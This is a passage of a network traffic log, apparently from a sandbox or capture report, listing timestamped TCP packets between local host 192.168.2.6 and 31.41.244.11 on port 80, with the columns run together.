                                                                                                                                                              Dec 18, 2024 11:47:44.102101088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.103096962 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.103153944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.103189945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.103250027 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.104276896 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.104322910 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.104367971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.104403019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.105547905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.105596066 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.105637074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.105689049 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.106765032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.106817007 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.106873035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.106910944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.107829094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.107878923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.107968092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.108015060 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.109047890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.109095097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.109170914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.109208107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.110249043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.110301971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.110351086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.110392094 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.111386061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.111433983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.111490965 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.111534119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.112574100 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.112622023 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.112883091 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.112925053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.113737106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.113780975 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.113854885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.113894939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.114916086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.114960909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.115037918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.115089893 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.116087914 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.116137981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.116219044 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.116261005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.117278099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.117320061 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.117383003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.117455959 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.118458986 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.118518114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.118572950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.118616104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.119674921 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.119728088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.119775057 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.119817019 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.120834112 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.120882034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.120934963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.120978117 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.122039080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.122092962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.122178078 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.122220039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.123225927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.123279095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.123348951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.123393059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.124398947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.124452114 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.124490023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.124533892 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.125591040 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.125637054 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.125874043 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.125927925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.126786947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.126832962 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.126878023 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.126920938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.127943039 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.128000021 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.128048897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.128091097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.129118919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.129168034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.129210949 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.129254103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.130307913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.130362034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.130414963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.130455971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.131472111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.131527901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.131575108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.131616116 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.132775068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.132844925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.132850885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.132893085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.133929968 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.133985996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.134036064 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.134073973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.135080099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.135133028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.135180950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.135222912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.136229038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.136272907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.136322021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.136363029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.137439966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.137489080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.137526035 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.137567043 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.138577938 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.138626099 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.138675928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.138720989 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.139758110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.139806986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.139827013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.139870882 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.141073942 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.141133070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.270479918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.270539999 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.270592928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.270592928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.270957947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.271008015 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.271147966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.271194935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.272166967 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.272222042 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.272269011 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.272315979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.273576021 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.273627996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.273653030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.273693085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.274883032 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.274903059 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.274931908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.274951935 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.275810957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.275881052 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.275892019 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.275935888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.276926994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.276979923 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.277014971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.277060986 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.278115034 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.278162003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.278187990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.278232098 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.279270887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.279324055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.279361963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.279403925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.280564070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.280612946 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.280637026 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.280678034 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.281655073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.281699896 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.282074928 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.282116890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.283003092 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.283049107 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.283092976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.283138037 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.284019947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.284061909 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.284120083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.284158945 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.285173893 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.285217047 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.285310030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.285355091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.286386013 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.286438942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.286465883 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.286504984 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.287596941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.287648916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.287698984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.287744045 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.288790941 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.288839102 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.288892984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.288933039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.289925098 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.289988041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.290035963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.290080070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.291141033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.291205883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.291323900 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.291373968 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.292280912 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.292365074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.292418003 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.292457104 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.293479919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.293512106 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.293526888 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.293550014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.294646025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.294692993 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.294743061 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.294780970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.295902014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.295948982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.295995951 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.296037912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.297003031 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.297049046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.297113895 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.297151089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.298278093 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.298322916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.298377991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.298413992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.299402952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.299448013 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.299484015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.299523115 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.300592899 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.300638914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.300656080 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.300693035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.301749945 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.301795006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.301851988 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.301892996 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.302937984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.302980900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.303016901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.303052902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.304126024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.304164886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.304210901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.304246902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.305286884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.305337906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.305376053 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.305414915 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.306529045 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.306582928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.306622028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.306658983 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.307672024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.307725906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.307773113 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.307810068 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.308852911 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.308912992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.308974028 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.309026003 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.310053110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.310096979 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.310153961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.310198069 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.311217070 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.311270952 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.311335087 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.311371088 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.312406063 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.312460899 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.312510014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.312553883 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.313594103 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.313652039 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.313704014 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.313740969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.314754009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.314810038 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.314831972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.314874887 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.315931082 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.315982103 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.316133022 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.316171885 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.317121029 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.317166090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.317259073 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.317302942 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.318373919 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.318419933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.318469048 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.318515062 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.337848902 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.337893009 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.337908983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.337930918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.337976933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.337976933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.338037014 CET804987831.41.244.11192.168.2.6
